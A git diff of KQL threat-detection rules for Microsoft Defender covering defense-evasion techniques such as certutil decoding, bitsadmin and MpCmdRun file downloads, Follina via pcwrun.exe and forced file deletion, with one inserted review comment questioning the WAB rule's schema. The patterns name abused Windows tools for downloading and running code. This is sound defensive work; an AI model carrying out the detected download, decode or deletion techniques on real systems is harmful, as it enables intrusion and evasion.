+++ b/KQL/rules/Defense Evasion/execute_from_alternate_data_streams.kql
@@ -1,10 +1,10 @@
-// Title: Execute From Alternate Data Streams
-// Author: frack113
-// Date: 2021-09-01
-// Level: medium
-// Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1564.004
-
-DeviceProcessEvents
+// Title: Execute From Alternate Data Streams
+// Author: frack113
+// Date: 2021-09-01
+// Level: medium
+// Description: Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "txt:" and ((ProcessCommandLine contains "esentutl " and ProcessCommandLine contains " /y " and ProcessCommandLine contains " /d " and ProcessCommandLine contains " /o ") or (ProcessCommandLine contains "makecab " and ProcessCommandLine contains ".cab") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains " export ") or (ProcessCommandLine contains "regedit " and ProcessCommandLine contains " /E ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > "))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql b/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql
index 39609343..f1cd71f7 100644
--- a/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql
+++ b/KQL/rules/Defense Evasion/execute_pcwrun_exe_to_leverage_follina.kql
@@ -1,12 +1,12 @@
-// Title: Execute Pcwrun.EXE To Leverage Follina
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-13
-// Level: high
-// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.execution
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Execute Pcwrun.EXE To Leverage Follina
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-13
+// Level: high
+// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.execution
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "../" and FolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql b/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql
index 1919c3e5..8cb98ccc 100644
--- a/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql
+++ b/KQL/rules/Defense Evasion/execution_dll_of_choice_using_wab_exe.kql
@@ -1,10 +1,10 @@
-// Title: Execution DLL of Choice Using WAB.EXE
-// Author: oscd.community, Natalia Shornikova
-// Date: 2020-10-13
-// Level: high
-// Description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceRegistryEvents
+// Title: Execution DLL of Choice Using WAB.EXE
+// Author: oscd.community, Natalia Shornikova
+// Date: 2020-10-13
+// Level: high
+// Description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceRegistryEvents
 | where RegistryKey endswith "\\Software\\Microsoft\\WAB\\DLLPath" and (not(RegistryValueData =~ "%CommonProgramFiles%\\System\\wab32.dll"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql b/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql
index 7da04081..1e12eb9f 100644
--- a/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql
+++ b/KQL/rules/Defense Evasion/execution_of_non_existing_file.kql
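Review bot: `RegistryKey endswith "\\Software\\Microsoft\\WAB\\DLLPath"` treats the value name as the last component of the key path; in DeviceRegistryEvents the key and the value name are, as far as I can tell, separate columns, so a write to the `DLLPath` value would not satisfy this predicate and the rule would never fire. A form that matches the MDE schema would be `| where RegistryKey endswith "\\Software\\Microsoft\\WAB" and RegistryValueName =~ "DLLPath" and not(RegistryValueData =~ "%CommonProgramFiles%\\System\\wab32.dll")`. The default-value exclusion additionally assumes the sensor reports the unexpanded `%CommonProgramFiles%` string for this REG_EXPAND_SZ value; both points are worth confirming with a test write before the rule is relied on.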
@@ -1,10 +1,10 @@
-// Title: Execution Of Non-Existing File
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2021-12-09
-// Level: high
-// Description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Execution Of Non-Existing File
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2021-12-09
+// Level: high
+// Description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where (not(FolderPath contains "\\")) and (not((((FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or (ProcessCommandLine in~ ("Registry", "MemCompression", "vmmem"))) or (FolderPath in~ ("-", "")) or isnull(FolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql b/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql
index eee3239b..0b080057 100644
--- a/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql
+++ b/KQL/rules/Defense Evasion/execution_of_suspicious_file_type_extension.kql
@@ -1,11 +1,11 @@
-// Title: Execution of Suspicious File Type Extension
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2021-12-09
-// Level: medium
-// Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.
-// This rule might require some initial baselining to align with some third party tooling in the user environment.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Execution of Suspicious File Type Extension
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2021-12-09
+// Level: medium
+// Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.
+// This rule might require some initial baselining to align with some third party tooling in the user environment. 
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
 | where (not((FolderPath endswith ".bin" or FolderPath endswith ".cgi" or FolderPath endswith ".com" or FolderPath endswith ".exe" or FolderPath endswith ".scr" or FolderPath endswith ".tmp"))) and (not((FolderPath contains ":\\$Extend\\$Deleted\\" or FolderPath contains ":\\Windows\\System32\\DriverStore\\FileRepository\\" or (FolderPath in~ ("-", "")) or (FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or FolderPath contains ":\\Windows\\Installer\\MSI" or (FolderPath contains ":\\Config.Msi\\" and (FolderPath endswith ".rbf" or FolderPath endswith ".rbs")) or isnull(FolderPath) or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\")))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Avira\\" or (FolderPath endswith "com.docker.service" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe") or FolderPath contains ":\\Program Files\\Mozilla Firefox\\" or FolderPath endswith "\\LZMA_EXE" or (FolderPath endswith ":\\Program Files (x86)\\MyQ\\Server\\pcltool.dll" or FolderPath endswith ":\\Program Files\\MyQ\\Server\\pcltool.dll") or (FolderPath contains "NVIDIA\\NvBackend\\" and FolderPath endswith ".dat") or ((FolderPath contains ":\\Program Files (x86)\\WINPAKPRO\\" or FolderPath contains ":\\Program Files\\WINPAKPRO\\") and FolderPath endswith ".ngn") or (FolderPath contains "\\AppData\\Local\\Packages\\" and FolderPath contains "\\LocalState\\rootfs\\"))))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql b/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql
index a2492d3d..7ae58432 100644
--- a/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql
+++ b/KQL/rules/Defense Evasion/execution_via_stordiag_exe.kql
@@ -1,12 +1,12 @@
-// Title: Execution via stordiag.exe
-// Author: Austin Songer (@austinsonger)
-// Date: 2021-10-21
-// Level: high
-// Description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate usage of stordiag.exe.
-
-DeviceProcessEvents
+// Title: Execution via stordiag.exe
+// Author: Austin Songer (@austinsonger)
+// Date: 2021-10-21
+// Level: high
+// Description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage of stordiag.exe.
+
+DeviceProcessEvents
 | where ((FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\fltmc.exe") and InitiatingProcessFolderPath endswith "\\stordiag.exe") and (not((InitiatingProcessFolderPath startswith "c:\\windows\\system32\\" or InitiatingProcessFolderPath startswith "c:\\windows\\syswow64\\")))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql b/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql
index cd379a4a..969d8c96 100644
--- a/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql
+++ b/KQL/rules/Defense Evasion/execution_via_workfolders_exe.kql
@@ -1,12 +1,12 @@
-// Title: Execution via WorkFolders.exe
-// Author: Maxime Thiebaut (@0xThiebaut)
-// Date: 2021-10-21
-// Level: high
-// Description: Detects using WorkFolders.exe to execute an arbitrary control.exe
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-// False Positives:
-// - Legitimate usage of the uncommon Windows Work Folders feature.
-
-DeviceProcessEvents
+// Title: Execution via WorkFolders.exe
+// Author: Maxime Thiebaut (@0xThiebaut)
+// Date: 2021-10-21
+// Level: high
+// Description: Detects using WorkFolders.exe to execute an arbitrary control.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate usage of the uncommon Windows Work Folders feature.
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\control.exe" and InitiatingProcessFolderPath endswith "\\WorkFolders.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\control.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/explorer_process_tree_break.kql b/KQL/rules/Defense Evasion/explorer_process_tree_break.kql
index d4a193d3..0312650f 100644
--- a/KQL/rules/Defense Evasion/explorer_process_tree_break.kql
+++ b/KQL/rules/Defense Evasion/explorer_process_tree_break.kql
@@ -1,11 +1,11 @@
-// Title: Explorer Process Tree Break
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber
-// Date: 2019-06-29
-// Level: medium
-// Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,
-// which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1036
-
-DeviceProcessEvents
+// Title: Explorer Process Tree Break
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber
+// Date: 2019-06-29
+// Level: medium
+// Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,
+// which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}" or (ProcessCommandLine contains "explorer.exe" and (ProcessCommandLine contains " -root," or ProcessCommandLine contains " /root," or ProcessCommandLine contains " –root," or ProcessCommandLine contains " —root," or ProcessCommandLine contains " ―root,"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql b/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql
index 553e9771..92b81623 100644
--- a/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql
+++ b/KQL/rules/Defense Evasion/file_decoded_from_base64_hex_via_certutil_exe.kql
@@ -1,10 +1,10 @@
-// Title: File Decoded From Base64/Hex Via Certutil.EXE
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2023-02-15
-// Level: high
-// Description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1027
-
-DeviceProcessEvents
+// Title: File Decoded From Base64/Hex Via Certutil.EXE
+// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
+// Date: 2023-02-15
+// Level: high
+// Description: Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-decode " or ProcessCommandLine contains "/decode " or ProcessCommandLine contains "–decode " or ProcessCommandLine contains "—decode " or ProcessCommandLine contains "―decode " or ProcessCommandLine contains "-decodehex " or ProcessCommandLine contains "/decodehex " or ProcessCommandLine contains "–decodehex " or ProcessCommandLine contains "—decodehex " or ProcessCommandLine contains "―decodehex ") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql b/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql
index 93d5dc05..5e684206 100644
--- a/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql
+++ b/KQL/rules/Defense Evasion/file_deleted_via_sysinternals_sdelete.kql
@@ -1,12 +1,12 @@
-// Title: File Deleted Via Sysinternals SDelete
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020-05-02
-// Level: medium
-// Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.004
-// False Positives:
-// - Legitimate usage
-
-DeviceFileEvents
+// Title: File Deleted Via Sysinternals SDelete
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+// - Legitimate usage
+
+DeviceFileEvents
 | where (FolderPath endswith ".AAA" or FolderPath endswith ".ZZZ") and (not(FolderPath endswith "\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_deletion.kql b/KQL/rules/Defense Evasion/file_deletion.kql
index e0470dc3..8bd86d21 100644
--- a/KQL/rules/Defense Evasion/file_deletion.kql
+++ b/KQL/rules/Defense Evasion/file_deletion.kql
@@ -1,12 +1,12 @@
-// Title: File Deletion
-// Author: Ömer Günal, oscd.community
-// Date: 2020-10-07
-// Level: informational
-// Description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.004
-// False Positives:
-// - Legitimate administration activities
-
-DeviceProcessEvents
+// Title: File Deletion
+// Author: Ömer Günal, oscd.community
+// Date: 2020-10-07
+// Level: informational
+// Description: Detects file deletion using "rm", "shred" or "unlink" commands which are used often by adversaries to delete files left behind by the actions of their intrusion activity
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+// - Legitimate administration activities
+
+DeviceProcessEvents
 | where FolderPath endswith "/rm" or FolderPath endswith "/shred" or FolderPath endswith "/unlink"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_deletion_via_del.kql b/KQL/rules/Defense Evasion/file_deletion_via_del.kql
index 10fa132c..69bf76f7 100644
--- a/KQL/rules/Defense Evasion/file_deletion_via_del.kql
+++ b/KQL/rules/Defense Evasion/file_deletion_via_del.kql
@@ -1,15 +1,15 @@
-// Title: File Deletion Via Del
-// Author: frack113
-// Date: 2022-01-15
-// Level: low
-// Description: Detects execution of the builtin "del"/"erase" commands in order to delete files.
-// Adversaries may delete files left behind by the actions of their intrusion activity.
-// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
-// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1070.004
-// False Positives:
-// - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity
-
-DeviceProcessEvents
+// Title: File Deletion Via Del
+// Author: frack113
+// Date: 2022-01-15
+// Level: low
+// Description: Detects execution of the builtin "del"/"erase" commands in order to delete files.
+// Adversaries may delete files left behind by the actions of their intrusion activity.
+// Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
+// Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1070.004
+// False Positives:
+// - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains " -f" or ProcessCommandLine contains " /f" or ProcessCommandLine contains " –f" or ProcessCommandLine contains " —f" or ProcessCommandLine contains " ―f" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s" or ProcessCommandLine contains " -q" or ProcessCommandLine contains " /q" or ProcessCommandLine contains " –q" or ProcessCommandLine contains " —q" or ProcessCommandLine contains " ―q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql b/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql
index 88c5dd72..bfa9c152 100644
--- a/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql
+++ b/KQL/rules/Defense Evasion/file_download_using_protocolhandler_exe.kql
@@ -1,10 +1,10 @@
-// Title: File Download Using ProtocolHandler.exe
-// Author: frack113
-// Date: 2021-07-13
-// Level: medium
-// Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: File Download Using ProtocolHandler.exe
+// Author: frack113
+// Date: 2021-07-13
+// Level: medium
+// Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\protocolhandler.exe" or ProcessVersionInfoOriginalFileName =~ "ProtocolHandler.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql b/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql
index 60f2f41e..f4f2a035 100644
--- a/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql
+++ b/KQL/rules/Defense Evasion/file_download_via_bitsadmin.kql
@@ -1,12 +1,12 @@
-// Title: File Download Via Bitsadmin
-// Author: Michael Haag, FPT.EagleEye
-// Date: 2017-03-09
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-// False Positives:
-// - Some legitimate apps use this, but limited.
-
-DeviceProcessEvents
+// Title: File Download Via Bitsadmin
+// Author: Michael Haag, FPT.EagleEye
+// Date: 2017-03-09
+// Level: medium
+// Description: Detects usage of bitsadmin downloading a file
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+// False Positives:
+// - Some legitimate apps use this, but limited.
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http"))
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql
index 6d1a44f6..f2966d71 100644
--- a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql
+++ b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_a_suspicious_target_folder.kql
@@ -1,10 +1,10 @@
-// Title: File Download Via Bitsadmin To A Suspicious Target Folder
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-
-DeviceProcessEvents
+// Title: File Download Via Bitsadmin To A Suspicious Target Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: high
+// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql
index 4892bb28..dc75d930 100644
--- a/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql
+++ b/KQL/rules/Defense Evasion/file_download_via_bitsadmin_to_an_uncommon_target_folder.kql
@@ -1,10 +1,10 @@
-// Title: File Download Via Bitsadmin To An Uncommon Target Folder
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-06-28
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file to uncommon target folder
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-
-DeviceProcessEvents
+// Title: File Download Via Bitsadmin To An Uncommon Target Folder
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-28
+// Level: medium
+// Description: Detects usage of bitsadmin downloading a file to uncommon target folder
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql b/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql
index d1b3a747..e1383f7d 100644
--- a/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql
+++ b/KQL/rules/Defense Evasion/file_download_via_installutil_exe.kql
@@ -1,10 +1,10 @@
-// Title: File Download Via InstallUtil.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022-08-19
-// Level: medium
-// Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218
-
-DeviceProcessEvents
+// Title: File Download Via InstallUtil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-19
+// Level: medium
+// Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\InstallUtil.exe" or ProcessVersionInfoOriginalFileName =~ "InstallUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql b/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql
index 97cd556e..18b4e268 100644
--- a/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql
+++ b/KQL/rules/Defense Evasion/file_download_via_nscurl_macos.kql
@@ -1,12 +1,12 @@
-// Title: File Download Via Nscurl - MacOS
-// Author: Daniel Cortez
-// Date: 2024-06-04
-// Level: medium
-// Description: Detects the execution of the nscurl utility in order to download files.
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105
-// False Positives:
-// - Legitimate usage of nscurl by administrators and users.
-
-DeviceProcessEvents
+// Title: File Download Via Nscurl - MacOS
+// Author: Daniel Cortez
+// Date: 2024-06-04
+// Level: medium
+// Description: Detects the execution of the nscurl utility in order to download files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.t1105
+// False Positives:
+// - Legitimate usage of nscurl by administrators and users.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "--download " or ProcessCommandLine contains "--download-directory " or ProcessCommandLine contains "--output " or ProcessCommandLine contains "-dir " or ProcessCommandLine contains "-dl " or ProcessCommandLine contains "-ld" or ProcessCommandLine contains "-o ") and FolderPath endswith "/nscurl"
\ No newline at end of file
diff --git a/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql b/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql
index 06cccb70..a7430eb1 100644
--- a/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql
+++ b/KQL/rules/Defense Evasion/file_download_via_windows_defender_mpcmprun_exe.kql
@@ -1,10 +1,10 @@
-// Title: File Download Via Windows Defender MpCmpRun.EXE
-// Author: Matthew Matchen
-// Date: 2020-09-04
-// Level: high
-// Description: Detects the use of Windows Defender MpCmdRun.EXE to download files
-// MITRE Tactic: Defense Evasion
-// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
-
-DeviceProcessEvents
+// Title: File Download Via Windows Defender MpCmpRun.EXE
+// Author: Matthew Matchen
+// Date: 2020-09-04
+// Level: high
+// Description: Detects the use of Windows Defender MpCmdRun.EXE to download files
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218, attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "DownloadFile" and ProcessCommandLine contains "url") and (ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe" or FolderPath endswith "\\MpCmdRun.exe" or ProcessCommandLine contains "MpCmdRun.exe" or ProcessVersionInfoFileDescription =~ "Microsoft Malware Protection Command Line Utility")
\ No newline at end of file
